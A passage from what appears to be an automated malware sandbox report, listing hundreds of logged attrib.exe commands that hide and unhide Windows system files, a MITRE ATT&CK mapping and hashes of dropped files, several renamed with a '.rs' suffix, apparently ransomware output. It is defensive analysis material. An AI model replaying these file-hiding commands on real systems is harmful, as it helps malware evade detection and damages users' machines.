1⤵
PID:5696

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\System\DirectDB.dll"
1⤵
PID:3196

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\cs-CZ\bootmgr.exe.mui"
1⤵
PID:13344

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\customizations.xml"
1⤵
PID:14264

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui"
1⤵
- Views/modifies file attributes
PID:15356

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
1⤵
PID:3584

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui"
1⤵
PID:10720

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157"
1⤵
PID:6036

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
1⤵
PID:5472

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\customizations.xml"
1⤵
PID:9512

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi"
1⤵
PID:16308

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico"
1⤵
PID:5672

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch"
1⤵
PID:7504

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\ELAMBKUP\WdBoot.sys"
2⤵
PID:852

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\Content.xml"
1⤵
PID:7368

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
1⤵
PID:11520

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Public\Downloads\desktop.ini"
1⤵
PID:8036

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Public\Downloads\desktop.ini.rs"
1⤵
PID:14212

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\de-DE\bootmgr.exe.mui"
1⤵
PID:16984

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui"
1⤵
PID:10480

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\System\ado\msader15.dll"
1⤵
PID:12936

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\el-GR\bootmgr.exe.mui"
1⤵
PID:9516

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\appcompat\Programs\Amcache.hve.LOG2"
1⤵
PID:12796

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Public\Libraries\desktop.ini"
1⤵
PID:10436

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\customizations.xml"
1⤵
PID:9620

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieUserList\container.dat"
1⤵
PID:15976

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\customizations.xml"
1⤵
PID:10644

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Network\Downloader\edbres00002.jrs"
1⤵
PID:10940

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\mshwLatin.dll.mui"
1⤵
PID:18828

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
1⤵
PID:21892

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico"
1⤵
PID:16984

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\rtscom.dll.mui"
1⤵
PID:13308

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\container.dat"
1⤵
PID:18872

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\el-GR\memtest.exe.mui"
1⤵
PID:19480

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini"
1⤵
PID:18340

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg"
1⤵
PID:11320

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Internet Explorer\ie9props.propdesc"
1⤵
- Views/modifies file attributes
PID:18268

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\fi-FI\bootmgr.exe.mui"
1⤵
- Views/modifies file attributes
PID:10772

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime.xml"
1⤵
PID:6196

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov"
1⤵
PID:14192

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\ntuser.ini.rs"
1⤵
PID:19556

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif"
1⤵
PID:17964

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63"
1⤵
PID:12992

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
1⤵
- Views/modifies file attributes
PID:5612

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\Ole DB\msdaenum.dll"
1⤵
PID:5832

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\ntuser.ini"
1⤵
PID:13108

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\fr-CA\bootmgr.exe.mui"
1⤵
PID:21700

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\es-MX\bootmgr.exe.mui"
1⤵
- Views/modifies file attributes
PID:15576

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\60cdf0816278bf540dd5e4da46e7f979\Microsoft.Management.Infrastructure.Native.ni.dll"
1⤵
PID:20508

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\Branding\Basebrd\en-US\basebrd.dll.mui"
1⤵
PID:15400

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\ado\msader15.dll"
1⤵
PID:12996

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml"
1⤵
- Views/modifies file attributes
PID:15788

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\Microsoft.Ink.dll"
1⤵
PID:16996

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\fr-FR\bootmgr.exe.mui"
1⤵
PID:7756

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\Fonts\chs_boot.ttf"
1⤵
PID:18620

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\en-US\bfsvc.exe.mui"
1⤵
- Views/modifies file attributes
PID:19764

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Public\Downloads\desktop.ini"
1⤵
PID:12584

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
1⤵
PID:3204

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc"
1⤵
PID:18912

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico"
1⤵
PID:15060

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ\tipresx.dll.mui"
1⤵
PID:4640

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\MasterDatastore.xml"
1⤵
PID:15244

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\MasterDatastore.xml"
1⤵
PID:12160

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb00004.jtx"
1⤵
PID:19520

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\customizations.xml"
1⤵
PID:500

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\System\msadc\adcjavas.inc"
1⤵
PID:7748

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\0__Power_Policy.provxml"
1⤵
PID:21624

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\AppPatch\AcSpecfc.dll"
1⤵
PID:19696

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.htm"
1⤵
PID:15612

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\User Account Pictures\user-192.png"
1⤵
PID:17848

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\MasterDatastore.xml"
1⤵
PID:5704

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini"
1⤵
PID:19012

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\GapaEngine.dll"
1⤵
- Views/modifies file attributes
PID:13888

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov"
1⤵
PID:4140

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.dcfmui.msi.16.en-us.xml"
1⤵
PID:6704

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
1⤵
PID:20488

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\da-DK\memtest.exe.mui"
1⤵
- Views/modifies file attributes
PID:14464

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\BitLockerDiscoveryVolumeContents\bg-BG_BitLockerToGo.exe.mui"
1⤵
PID:18200

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"
1⤵
PID:17676

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Public\Music\desktop.ini"
1⤵
PID:18996

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\customizations.xml"
1⤵
PID:8632

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieUserList\container.dat"
1⤵
PID:8452

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll"
1⤵
PID:9100

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
1⤵
PID:21748

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
1⤵
- Views/modifies file attributes
PID:20248

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
1⤵
PID:21764

C:\Windows\system32\attrib.exe
attrib -h "C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini"
1⤵
PID:21708

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\en-us.16\stream.x64.en-us.dat.cat"
1⤵
PID:18980

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico"
1⤵
PID:16688

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
1⤵
PID:10292

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini.rs"
1⤵
PID:6076

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db"
1⤵
PID:11204

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"
1⤵
PID:11644

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf"
1⤵
PID:11596

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"
1⤵
PID:3476

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\MasterDatastore.xml"
1⤵
PID:15912

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\wab32.dll"
1⤵
PID:18248

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\et-EE\bootmgr.exe.mui"
1⤵
PID:12808

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\en-GB\bootmgr.exe.mui"
1⤵
- Views/modifies file attributes
PID:12236

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui"
1⤵
PID:5308

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch"
1⤵
PID:412

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\9f7cb6d4da138950aeaa4f869df5a39e\Microsoft.Management.Infrastructure.ni.dll"
1⤵
PID:21932

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\wab32res.dll"
1⤵
PID:8616

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini.rs"
1⤵
PID:16804

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\Downloads\desktop.ini"
1⤵
PID:14556

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
1⤵
PID:16648

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini"
1⤵
PID:1988

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini.rs"
1⤵
PID:10532

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui"
1⤵
PID:17984

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Downloads\desktop.ini.rs"
1⤵
PID:11604

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll"
1⤵
PID:8160

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
1⤵
PID:11112

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Engine.dll"
1⤵
PID:16928

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\explorer.exe"
1⤵
PID:6800

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif"
1⤵
PID:16988

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\Stationery\Bears.jpg"
1⤵
PID:8924

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg"
1⤵
PID:17036

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll"
1⤵
PID:10852

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\fi-FI\bootmgr.exe.mui"
1⤵
PID:6536

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui"
1⤵
PID:1324

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\en-US\bootmgr.exe.mui"
1⤵
PID:22436

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms"
1⤵
PID:22392

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\de-DE\bootmgr.exe.mui"
1⤵
PID:22280

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime.xml"
1⤵
PID:22272

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\msadc\adcjavas.inc"
1⤵
PID:22264

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\customizations.xml"
1⤵
PID:22252

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Public\Libraries\desktop.ini"
1⤵
PID:21672

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\el-GR\bootmgr.exe.mui"
1⤵
PID:21620

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\System\Ole DB\msdaenum.dll"
1⤵
PID:7976

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\60cdf0816278bf540dd5e4da46e7f979\Microsoft.Management.Infrastructure.Native.ni.dll"
1⤵
PID:6960

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Internet Explorer\hmmapi.dll"
1⤵
PID:9364

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico"
1⤵
PID:8908

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\Branding\Basebrd\en-US\basebrd.dll.mui"
1⤵
PID:11476

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini.rs

MD5
4c42309dc38dfe077d89354acdbe734c

SHA1
47e8c4811ffd78fd6a1fb9f7cf85ad91aae26e57

SHA256
60bdb0e35a555b381e94f1e15c481f421721247ae45db523995dd1e9d60439ce

SHA512
5f95d9ad5e08b8307c848d6f1b495131ca0917a5d76c97d8a03d9c158e15646b84b3df25c721e623dac4c6261c92b69c63cd29ebbed1ccd53ea658a074920375

Download Submit
C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.htm.rs

MD5
dffa240ace4b6bd3cac4b589c76707c3

SHA1
7c11834ccff160055689ac5de3981bb15f82d2d9

SHA256
e8f347cad09dc31b4e8a2ebd7306d4c0aa313c634123434f1b3a76e7839dc562

SHA512
068bd9a2e24d03d4687701b7316c06b26c573c25689592a3972813c3bbdef0783ae318fc710567fba1027baea83140ba1a8a0081ff9d1234ea9ce5987bf30274

Download Submit
C:\Program Files (x86)\desktop.ini.rs

MD5
1891f03ffa31cdd6bc88caae7c48dfb3

SHA1
d676bd7ff078f71ddaae8d4a549ec09f859fd1e3

SHA256
6c5da4d4a2e48e65e25c9585ca9335afa2080d62a1d658f669be186f7be2c4f5

SHA512
d9e2d3e35be44b5cb433b7a339d882e91b125abe59fae221b7a8b571589182360fc32096433cd930478e88219c716547d60e8b2716c6b492918e5b07c819cd4b

Download Submit
C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1.rs

MD5
5b2fb466b431dbf747d99ecf80efae54

SHA1
b988e95ebca28a3104b6d5e79537da6150de780f

SHA256
0554492df57170d65213bbbdc64f4dd103c52dacc97ed07eff691398bf4e8ae7

SHA512
d60f735e279a27e4bfa162fc7066ef2d777117e6ca16d380719e450f2b6d3d3e0d42c0a3c8d64ed819ac0f4915d5fc0313c18700e0ff7a70edd701f20129580e

Download Submit
C:\Users\Admin\AppData\Local\IconCache.db.rs

MD5
d03b8c81d32b9cbb4f4094ef1d925526

SHA1
74949228542b7769a2e1458e02842974ea3200bd

SHA256
64c04df36d14464f0b5c464b95bad9a1d1650fb319eeef6c940dcfd5e2fd033b

SHA512
a8c10073320c3d7329d24f945695dac3e374f0471e22f5b09fdd742f021b9eb9ef5cf2d82fa5d96e2b808f1638ac9cf0e06227a30f53a3131d3b291b7da542e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\VCRUNTIME140.dll

MD5
89a24c66e7a522f1e0016b1d0b4316dc

SHA1
5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42

SHA256
3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6

SHA512
e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_bz2.pyd

MD5
cf77513525fc652bad6c7f85e192e94b

SHA1
23ec3bb9cdc356500ec192cac16906864d5e9a81

SHA256
8bce02e8d44003c5301608b1722f7e26aada2a03d731fa92a48c124db40e2e41

SHA512
dbc1ba8794ce2d027145c78b7e1fc842ffbabb090abf9c29044657bdecd44396014b4f7c2b896de18aad6cfa113a4841a9ca567e501a6247832b205fe39584a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_cffi_backend.cp37-win_amd64.pyd

MD5
47b879422f88a07aadf12201b370b851

SHA1
d64fb4865bbb495006bf9fff33e46f8a005b10d4

SHA256
f0a2c12614601f31262810c5830c00fd3e3658a0abba2d13b79caae27d6c55b4

SHA512
f691f84817994dafa9a644984783fb1283a3ad7d7eef27cc2d427a63de9ed6901d99454ce4aca3683d123cf8af12e6179b81275c4bb7a7cf1c905540ee1fac6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_ctypes.pyd

MD5
5e869eebb6169ce66225eb6725d5be4a

SHA1
747887da0d7ab152e1d54608c430e78192d5a788

SHA256
430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173

SHA512
feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_hashlib.pyd

MD5
b32cb9615a9bada55e8f20dcea2fbf48

SHA1
a9c6e2d44b07b31c898a6d83b7093bf90915062d

SHA256
ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5

SHA512
5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_lzma.pyd

MD5
5fbb728a3b3abbdd830033586183a206

SHA1
066fde2fa80485c4f22e0552a4d433584d672a54

SHA256
f9bc6036d9e4d57d08848418367743fb608434c04434ab07da9dabe4725f9a9b

SHA512
31e7c9fe9d8680378f8e3ea4473461ba830df2d80a3e24e5d02a106128d048430e5d5558c0b99ec51c3d1892c76e4baa14d63d1ec1fc6b1728858aa2a255b2fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_socket.pyd

MD5
8ea18d0eeae9044c278d2ea7a1dbae36

SHA1
de210842da8cb1cb14318789575d65117d14e728

SHA256
9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2

SHA512
d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\_ssl.pyd

MD5
5a393bb4f3ae499541356e57a766eb6a

SHA1
908f68f4ea1a754fd31edb662332cf0df238cf9a

SHA256
b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047

SHA512
958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\base_library.zip

MD5
3db8b9c58902a8b906aeeb6609d619d8

SHA1
5ab4ee2490b18b77c0c206b597a412a1f7df7f01

SHA256
bcbfca4c7526d86ee07d23a2673caba778cdca45f2df653b88a2e12cfe9d2fdf

SHA512
f5af84c32a3c97d3f2400d64cb4df49fbbc289da074efe5c5b5ad8a74900ba8e73342963a491e0e20b3a3fba32c86da8e57b32114837264eee89d854d1fd33e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\cryptography\hazmat\bindings\_openssl.pyd

MD5
3f55712682ac3cc3c01131d946fe1f8d

SHA1
1339e820fb7765d57be51a7020d2bce54feefa7a

SHA256
40f5647c2f6183520adea109b6b5e17795065c5b9601e379f7b8259bcaa35767

SHA512
d2533207376d153c7f861d1e9b62f00cbd193ddfc51bbda182c20726ad116b8c6cb31c2b85efc13c41a581c1e6a5f803bbcb6814031ee77f64b2f41cd99fcf89

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\cryptography\hazmat\bindings\_padding.pyd

MD5
4054e5a3334d18ef458076ca479ece5a

SHA1
c4613d2432e6f1d27017d4430a163dd11b72c950

SHA256
f9cf98f1102ace4c2faa261887ad1726000f7f70871f0b932408cf527a7c23f3

SHA512
715559a5d892f4b850b66aab8589c5b5a0d1ebb1f5d12aff4fb0079dd726c7a5b8cecbc47d73a015947b39284317d27c12642b177d629c0c44ca376634e8b075

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\libcrypto-1_1.dll

MD5
cc4cbf715966cdcad95a1e6c95592b3d

SHA1
d5873fea9c084bcc753d1c93b2d0716257bea7c3

SHA256
594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1

SHA512
3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47962\libssl-1_1.dll

MD5
